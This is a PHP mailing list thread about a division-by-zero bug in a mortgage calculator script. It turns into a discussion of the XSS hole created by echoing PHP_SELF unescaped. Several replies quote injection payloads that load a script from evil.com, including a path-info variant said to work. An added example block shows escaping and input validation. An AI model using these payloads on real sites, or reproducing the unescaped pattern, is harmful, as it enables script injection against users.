Re: [PHP] Division by 0

2010-03-11 Thread Jochem Maas
Op 3/10/10 11:39 PM, Daniel Egeberg schreef:
 On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban dmi...@ruban.biz wrote:
 Hi Jochem,

 Jochem Maas wrote:

 Op 3/10/10 6:23 PM, Joseph Thayne schreef:

 Looks to me like you are closing your form before you put anything in
 it.  Therefore, the loan_amount is not set making the value 0.  Follow
 the math, and you are dividing by 1-1.

 Change this line:

 <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>

 to:

 <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">

 this is a XSS waiting to happen. I can put something like the following in
 the request uri:

 index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>

 Apparently it's not going to work. PHP_SELF does not include query string.
 So it is safe to use it this way.

 Regards,
 Dmitry
 
 No, it is not safe...
 
 This won't work:
   index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>
 
 But this will:
   index.php/" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>

yeah sorry, I was lax and made the query string mistake,
the issue stands though as Daniel pointed out.



 


-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Division by 0

2010-03-11 Thread Gary
I love this place, thank you to everyone that posted, I will make changes to 
make it safer.

Thanks again to everyone.

gary





RE: [PHP] Division by 0

2010-03-11 Thread Mike Roberts
I have tried and tried, countless times to be removed from this list...
still when I go to my deleted items I can see that emails leak through.
If there is an administrator who can simply delete me ( simply because I
can not seem to do this correctly) I would greatly appreciate it. Thank
You!





 Sincerely,

 Michael Roberts



Re: [PHP] Division by 0

2010-03-11 Thread Jochem Maas
Op 3/11/10 2:44 PM, Mike Roberts schreef:
 I have tried and tried, countless times to be removed from this list...
 still when I go to my deleted items I can see that emails leak through.
 If there is an administrator who can simply delete me ( simply because I
 can not seem to do this correctly) I would greatly appreciate it. Thank
 You!
 
 
 
 

no there is not (really!), either search the archives, search php.net,
look at the bottom of any of the emails sent via the list or check the
email headers of emails sent via the list - any one of those will give
you a way out.

but that probably is a bit of a technical challenge, so try this:

send a blank email to php-general-unsubscr...@lists.php.net using the email
account you are subscribed to the list to. all things being equal you should
receive a message saying either that you've been removed or that you need to
confirm the removal (which means either replying once more to that message
or clicking a link).

PS - it's generally considered bad form to reply to someone else's thread rather
than send a new message when you're not engaging the current conversation.




Re: [PHP] Division by 0

2010-03-10 Thread Jochem Maas
Op 3/10/10 6:23 PM, Joseph Thayne schreef:
 Looks to me like you are closing your form before you put anything in
 it.  Therefore, the loan_amount is not set making the value 0.  Follow
 the math, and you are dividing by 1-1.
 
 Change this line:
 
 <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
 
 to:
 
 <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">

this is a XSS waiting to happen. I can put something like the following in
the request uri:

index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>

with regard to the original problem - some input validation is in order.

(pow($intCalc,$totalPayments) - 1);

if $intCalc and $totalPayments are both equal to 1 then either something
is wrong and the calc shouldn't be done or some other calc needs to
be done.

every value being POSTed should be checked that it's been set, and that
it's a valid numeric value (for the numeric fields) ... if anything is
missing show the form again and display an error message without doing
the calculation.

 
 and you should be good to go.
 
 Joseph
 
 Gary wrote:
 I have a mortgage amortization script that was working fine,now it
 seems to have gone awry. Below is the entire script plus input page. 
 I am getting an error

 Warning: Division by zero in
 /home/content/J/a/y/Jayski/html/one2one/Ricksrecursivefunctions.php on
 line 47

 Which is  (pow($intCalc,$totalPayments) - 1);

 Frankly I am not even sure the information is being passed to the script.

 Anyone see what I am missing?

 Gary


   
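The two fixes asked for in the thread, escaping PHP_SELF before it is echoed into the form's action attribute and validating the POSTed numbers before the pow() division, as an added PHP example that is not Gary's script or any list member's code; the function names, the field bounds, reading int_rate as an annual percentage and the PHP 7.1 requirement are assumptions of this example.

```php
<?php
// Added example, not Gary's script or any list member's code: escape PHP_SELF
// before echoing it into the form, and validate every POSTed number before the
// amortisation maths runs. Function names, the field bounds and reading
// int_rate as an annual percentage are this example's assumptions (PHP 7.1+).

// A request for /index.php/" onsubmit="... arrives in PHP_SELF as path info, so
// the raw value must not be echoed into an attribute; entity-encode it instead.
function safeFormAction(): string
{
    return htmlspecialchars($_SERVER['PHP_SELF'] ?? '', ENT_QUOTES, 'UTF-8');
}

// Read one POSTed field as a number in [$min, $max]. Returns null when the field
// is missing, empty, non-numeric or out of range, instead of letting it become 0.
function postedNumber(array $post, string $field, float $min, float $max): ?float
{
    if (!isset($post[$field]) || !is_string($post[$field])) {
        return null;
    }
    $value = filter_var(trim($post[$field]), FILTER_VALIDATE_FLOAT);
    if ($value === false || $value < $min || $value > $max) {
        return null;
    }
    return $value;
}

// The thread's payment formula with its denominator pow($intCalc, $n) - 1
// guarded. A 0% rate makes that denominator exactly 0 and is a legitimate
// input: the payment is then simply the balance spread over the term.
function periodicPayment(float $balance, float $annualRatePercent, int $months): ?float
{
    $monthlyRate = $annualRatePercent / 100 / 12;
    if ($monthlyRate == 0.0) {
        return round($balance / $months, 2);
    }
    $intCalc = 1 + $monthlyRate;
    $denominator = pow($intCalc, $months) - 1;
    if ($denominator <= 0) {   // validation rules this out, but never divide blind
        return null;
    }
    return round($balance * pow($intCalc, $months) * $monthlyRate / $denominator, 2);
}
// Validate first; on any problem show the form again with a message and do no maths.
$errors  = [];
$balance = postedNumber($_POST, 'loan_amount', 0.01, 1e9);
$rate    = postedNumber($_POST, 'int_rate', 0, 100);
$months  = postedNumber($_POST, 'loan_term', 1, 600);
if ($balance === null) { $errors[] = 'Loan amount must be a positive number.'; }
if ($rate === null)    { $errors[] = 'Interest rate must be between 0 and 100 percent.'; }
if ($months === null)  { $errors[] = 'Term must be between 1 and 600 months.'; }
if ($errors) {   // a real page re-renders the input fields inside this form
    echo '<form action="' . safeFormAction() . '" method="post">';
    foreach ($errors as $e) { echo '<p>' . htmlspecialchars($e, ENT_QUOTES, 'UTF-8') . '</p>'; }
    echo '</form>';
} else {
    $payment = periodicPayment($balance, $rate, (int) $months);
    echo $payment === null ? 'Payment cannot be computed.' : 'Periodic payment: $' . number_format($payment, 2);
}
```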

Re: [PHP] Division by 0

2010-03-10 Thread Gary
Joseph

My apologies for not writing sooner to thank you, you were of course 
correct.  Thanks again.

Gary
Joseph Thayne webad...@thaynefam.org wrote in message 
news:4b97e3a2.2030...@thaynefam.org...
 Looks to me like you are closing your form before you put anything in it. 
 Therefore, the loan_amount is not set making the value 0.  Follow the 
 math, and you are dividing by 1-1.

 Change this line:

 <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>

 to:

 <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">

 and you should be good to go.

 Joseph

 Gary wrote:
 I have a mortgage amortization script that was working fine,now it seems 
 to have gone awry. Below is the entire script plus input page.  I am 
 getting an error

 Warning: Division by zero in 
 /home/content/J/a/y/Jayski/html/one2one/Ricksrecursivefunctions.php on 
 line 47

 Which is  (pow($intCalc,$totalPayments) - 1);

 Frankly I am not even sure the information is being passed to the script.

 Anyone see what I am missing?

 Gary


 <div id="onecol">Calculate your Loan</div>
 <div id="leftcontent">

 <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
 <table>
  <tr>
   <td style="background-color:#B1D8D8" width="110px">Loan Amount</td>
   <td><input name="loan_amount" type="text" size="25" /> USD</td>
   <td><a href="javascript:void(0);" onmouseover="Tip('This is the amount of money to be loaned.')" onmouseout="UnTip()"><img src="images/help.png" class="noborder" /></a></td>
  </tr>
  <tr>
   <td style="background-color:#B1D8D8" width="110px">Type of Loan</td>
   <td>
    <select name="type" size="1" id="type">
     <option>Installment</option>
     <option>Balloon</option>
    </select></td>
   <td><a href="javascript:void(0);" onmouseover="Tip('This is the method of repayment.')" onmouseout="UnTip()"><img src="images/help.png" class="noborder" /></a></td>
  </tr>
  <tr>
   <td style="background-color:#B1D8D8" width="100px">Term of Loan</td>
   <td><input name="loan_term" type="text" size="5" />
   </select>Months</td>
   <td><a href="javascript:void(0);" onmouseover="Tip('This is the amount of time that the money is loaned for.')" onmouseout="UnTip()"><img src="images/help.png" class="noborder" /></a></td>
  </tr>
  <tr>
   <td style="background-color:#B1D8D8" width="140px">Interest Rate</td>
   <td><input name="int_rate" type="text" size="10" /> Per Annum</td><td><a href="javascript:void(0);" onmouseover="Tip('Percentage (%) charged on loan on an annual basis. <br />Please see our FAQs for information on usury rates. <br />If no amount is entered this will be 0%.')" onmouseout="UnTip()"><img src="images/help.png" class="noborder" /></a></td>
  </tr>
 </table>
 <label>
 <input type="submit" name="submit" id="submit" value="submit" />
 </label>
 </form>
 <?php

 function amortizationTable($paymentNum, $periodicPayment, $balance,
                            $monthlyInterest) {
     $paymentInterest = round($balance * $monthlyInterest,2);
     $paymentPrincipal = round($periodicPayment - $paymentInterest,2);
     $newBalance = round($balance - $paymentPrincipal,2);
     print "<tr>
 <td>$paymentNum</td>
 <td>\$".number_format($balance,2)."</td>
 <td>\$".number_format($periodicPayment,2)."</td>
 <td>\$".number_format($paymentInterest,2)."</td>
 <td>\$".number_format($paymentPrincipal,2)."</td>
 </tr>";
     # If balance not yet zero, recursively call amortizationTable()
     if ($newBalance > 0) {
         $paymentNum++;
         amortizationTable($paymentNum, $periodicPayment, $newBalance,
                           $monthlyInterest);
     } else {
         exit;
     }
 } #end amortizationTable()

 # Loan balance
 $balance =($_POST['loan_amount']);

 # Loan interest rate
 $interestRate = ($_POST['int_rate']);

 # Monthly interest rate
 $monthlyInterest = ($interestRate / 12);

 # Term length of the loan, in years.
 $termLength =($_POST['loan_term']);

 # Number of payments per year.
 $paymentsPerYear = 12;

 # Payment iteration
 $paymentNumber =($_POST['loan_term']);

 # Perform preliminary calculations
 $totalPayments = $termLength * $paymentsPerYear;
 $intCalc = 1 + $interestRate / $paymentsPerYear;
 $periodicPayment = $balance * pow($intCalc,$totalPayments) *
     ($intCalc - 1) /
     (pow($intCalc,$totalPayments) - 1);
 $periodicPayment = round($periodicPayment,2);

 # Create table
 echo "<table width='50%' align='center' border='1'>";
 print "<tr>
     <th>Payment Number</th><th>Balance</th>
     <th>Payment</th><th>Interest</th><th>Principal</th>
     </tr>";

 # Call recursive function
 amortizationTable($paymentNumber, $periodicPayment, $balance,
                   $monthlyInterest);

 # Close table
 print "</table>";

 ?>
 </div>



Re: [PHP] Division by 0

2010-03-10 Thread Daniel Egeberg
On Wed, Mar 10, 2010 at 22:27, Jochem Maas joc...@iamjochem.com wrote:
 Op 3/10/10 6:23 PM, Joseph Thayne schreef:
 Looks to me like you are closing your form before you put anything in
 it.  Therefore, the loan_amount is not set making the value 0.  Follow
 the math, and you are dividing by 1-1.

 Change this line:

 <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>

 to:

 <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">

 this is a XSS waiting to happen. I can put something like the following in
 the request uri:

 index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>

 with regard to the original problem - some input validation is in order.

PHP_SELF doesn't contain the query string, so your particular attack
wouldn't work. It's still a security issue though.

-- 
Daniel Egeberg




Re: [PHP] Division by 0

2010-03-10 Thread Dmitry Ruban

Hi Jochem,

Jochem Maas wrote:

Op 3/10/10 6:23 PM, Joseph Thayne schreef:

Looks to me like you are closing your form before you put anything in
it.  Therefore, the loan_amount is not set making the value 0.  Follow
the math, and you are dividing by 1-1.

Change this line:

<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>

to:

<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">


this is a XSS waiting to happen. I can put something like the following in
the request uri:

index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>

Apparently it's not going to work. PHP_SELF does not include query 
string. So it is safe to use it this way.


Regards,
Dmitry





Re: [PHP] Division by 0

2010-03-10 Thread Daniel Egeberg
On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban dmi...@ruban.biz wrote:
 Hi Jochem,

 Jochem Maas wrote:

 Op 3/10/10 6:23 PM, Joseph Thayne schreef:

 Looks to me like you are closing your form before you put anything in
 it.  Therefore, the loan_amount is not set making the value 0.  Follow
 the math, and you are dividing by 1-1.

 Change this line:

 <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>

 to:

 <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">

 this is a XSS waiting to happen. I can put something like the following in
 the request uri:

 index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>

 Apparently it's not going to work. PHP_SELF does not include query string.
 So it is safe to use it this way.

 Regards,
 Dmitry

No, it is not safe...

This won't work:
  index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>

But this will:
  index.php/" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>

-- 
Daniel Egeberg
